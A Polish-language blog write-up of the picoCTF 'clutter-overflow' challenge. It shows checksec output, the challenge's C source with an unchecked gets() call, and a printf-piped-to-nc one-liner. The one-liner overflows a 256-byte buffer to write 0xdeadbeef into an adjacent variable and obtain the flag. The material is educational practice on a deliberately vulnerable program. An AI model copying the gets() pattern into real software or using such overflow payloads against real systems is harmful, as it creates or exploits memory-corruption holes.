poniedziałek, 13 stycznia 2025

picoCTF - clutter-overflow

W tym poście opiszę rozwiązania zadania clutter-overflow z picoCTF. 


Program wykonywalny można pobrać do zadania. Można na nim np. wywołać komendę checksec. Sprawdza ona jakie mechanimy bezpieczeństwa zostały zastosowane w pliku. 

  1. picoctf@webshell:~$ checksec chall
  2. [*] '/home/wojtek32756-picoctf/chall'
  3.     Arch:       amd64-64-little
  4.     RELRO:      Partial RELRO
  5.     Stack:      No canary found
  6.     NX:         NX enabled
  7.     PIE:        No PIE (0x400000)
  8.     Stripped:   No

Z pliku można się dowiedzieć, że architektura jest 64 bitowa, little endian. Brak mechanizmów ochrowny RELRO, brak "kanarka", mechanim ochrony pamięci włączony, brak PIE (adres pamięci statyczne), brak usuniętych symboli debugowania (stripped no). 

Do zadania dołączony jest kod programu:

  1. #include <stdio.h>
  2. #include <stdlib.h>
  3.  
  4. #define SIZE 0x100
  5. #define GOAL 0xdeadbeef
  6.  
  7. const char* HEADER =
  8. " ______________________________________________________________________\n"
  9. "|^ ^ ^ ^ ^ ^ |L L L L|^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^|\n"
  10. "| ^ ^ ^ ^ ^ ^| L L L | ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ |\n"
  11. "|^ ^ ^ ^ ^ ^ |L L L L|^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ==================^ ^ ^|\n"
  12. "| ^ ^ ^ ^ ^ ^| L L L | ^ ^ ^ ^ ^ ^ ___ ^ ^ ^ ^ /                  \\^ ^ |\n"
  13. "|^ ^_^ ^ ^ ^ =========^ ^ ^ ^ _ ^ /   \\ ^ _ ^ / |                | \\^ ^|\n"
  14. "| ^/_\\^ ^ ^ /_________\\^ ^ ^ /_\\ | //  | /_\\ ^| |   ____  ____   | | ^ |\n"
  15. "|^ =|= ^ =================^ ^=|=^|     |^=|=^ | |  {____}{____}  | |^ ^|\n"
  16. "| ^ ^ ^ ^ |  =========  |^ ^ ^ ^ ^\\___/^ ^ ^ ^| |__%%%%%%%%%%%%__| | ^ |\n"
  17. "|^ ^ ^ ^ ^| /     (   \\ | ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ |/  %%%%%%%%%%%%%%  \\|^ ^|\n"
  18. ".-----. ^ ||     )     ||^ ^.-------.-------.^|  %%%%%%%%%%%%%%%%  | ^ |\n"
  19. "|     |^ ^|| o  ) (  o || ^ |       |       | | /||||||||||||||||\\ |^ ^|\n"
  20. "| ___ | ^ || |  ( )) | ||^ ^| ______|_______|^| |||||||||||||||lc| | ^ |\n"
  21. "|'.____'_^||/!\\@@@@@/!\\|| _'______________.'|==                    =====\n"
  22. "|\\|______|===============|________________|/|\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n"
  23. "\" ||\"\"\"\"||\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"||\"\"\"\"\"\"\"\"\"\"\"\"\"\"||\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"  \n"
  24. "\"\"''\"\"\"\"''\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"''\"\"\"\"\"\"\"\"\"\"\"\"\"\"''\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n"
  25. "\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n"
  26. "\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"";
  27.  
  28. int main(void)
  29. {
  30.   long code = 0;
  31.   char clutter[SIZE];
  32.  
  33.   setbuf(stdout, NULL);
  34.   setbuf(stdin, NULL);
  35.   setbuf(stderr, NULL);
  36.    
  37.   puts(HEADER);
  38.   puts("My room is so cluttered...");
  39.   puts("What do you see?");
  40.  
  41.   gets(clutter);
  42.  
  43.  
  44.   if (code == GOAL) {
  45.     printf("code == 0x%llx: how did that happen??\n", GOAL);
  46.     puts("take a flag for your troubles");
  47.     system("cat flag.txt");
  48.   } else {
  49.     printf("code == 0x%llx\n", code);
  50.     printf("code != 0x%llx :(\n", GOAL);
  51.   }
  52.  
  53.   return 0;
  54. }

Jeśli do zmiennej kode zostaną wprowadzone dane jak w nagłówku GOAL (0xdeadbeef) to zostanie wyświetlona flaga. 

Dane wprowadzone do programu zostają wpisane do tablicy clutter[256]. W programie nie ma kontroli wprowadzonych danych. Oznacza to, że można przekroczyć pojemność buffora w celu nadpisania danych. Można to sprawdzić przez zapełnienie bufora. Wprowadzenie 268 znaków nadpisuje dane w zmiennej code:

  1. picoctf@webshell:~$ nc mars.picoctf.net 31890

  3. """""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
  4. My room is so cluttered...
  5. What do you see?
  6. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  7. code == 0x41414141
  8. code != 0xdeadbeef :(

Czyli należy wprowadzić 264 jakiekolwiek znaki. Następnie na ostatnich 4 bajtach danych wprowadzić potrzebne dane.

  1. picoctf@webshell:~$ nc mars.picoctf.net 31890
  2. My room is so cluttered...
  3. What do you see?
  4. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1234
  5. code == 0x34333231
  6. code != 0xdeadbeef :(

Bajty muszą być też odwrócone (little endian). Powyżej widać że do zmiennej zamiast 1234 zostało wpisane 4321. Dane nie mogą być też wprowadzone bezpośrednio w programie, ponieważ nie będą one poprawnie sformatowane. 

Flagę można uzyskać przez wprowadzenie następującej komendy:

  1. (printf 'A%.0s' {1..264}; printf '\xef\xbe\xad\xde\n') | nc mars.picoctf.net 31890

Wynik wykonania operacji:

  1. picoctf@webshell:~$ (printf 'A%.0s' {1..264}; printf '\xef\xbe\xad\xde\n') | nc mars.picoctf.net 31890
  2.  ______________________________________________________________________
  3. |^ ^ ^ ^ ^ ^ |L L L L|^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^|
  4. | ^ ^ ^ ^ ^ ^| L L L | ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ |
  5. |^ ^ ^ ^ ^ ^ |L L L L|^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ==================^ ^ ^|
  6. | ^ ^ ^ ^ ^ ^| L L L | ^ ^ ^ ^ ^ ^ ___ ^ ^ ^ ^ /                  \^ ^ |
  7. |^ ^_^ ^ ^ ^ =========^ ^ ^ ^ _ ^ /   \ ^ _ ^ / |                | \^ ^|
  8. | ^/_\^ ^ ^ /_________\^ ^ ^ /_\ | //  | /_\ ^| |   ____  ____   | | ^ |
  9. |^ =|= ^ =================^ ^=|=^|     |^=|=^ | |  {____}{____}  | |^ ^|
  10. | ^ ^ ^ ^ |  =========  |^ ^ ^ ^ ^\___/^ ^ ^ ^| |__%%%%%%%%%%%%__| | ^ |
  11. |^ ^ ^ ^ ^| /     (   \ | ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ |/  %%%%%%%%%%%%%%  \|^ ^|
  12. .-----. ^ ||     )     ||^ ^.-------.-------.^|  %%%%%%%%%%%%%%%%  | ^ |
  13. |     |^ ^|| o  ) (  o || ^ |       |       | | /||||||||||||||||\ |^ ^|
  14. | ___ | ^ || |  ( )) | ||^ ^| ______|_______|^| |||||||||||||||lc| | ^ |
  15. |'.____'_^||/!\@@@@@/!\|| _'______________.'|==                    =====
  16. |\|______|===============|________________|/|""""""""""""""""""""""""""
  17. " ||""""||"""""""""""""""||""""""""""""""||"""""""""""""""""""""""""""""  
  18. ""''""""''"""""""""""""""''""""""""""""""''""""""""""""""""""""""""""""""
  19. """"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
  20. """""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
  21. My room is so cluttered...
  22. What do you see?
  23. code == 0xdeadbeef: how did that happen??
  24. take a flag for your troubles
  25. picoCTF{xxxxxxxxxx_xxxxxxx_xx_xx_xxxxxx}

Autor: o
Etykiety:

Brak komentarzy:

Prześlij komentarz

Subskrybuj: Komentarze do posta (Atom)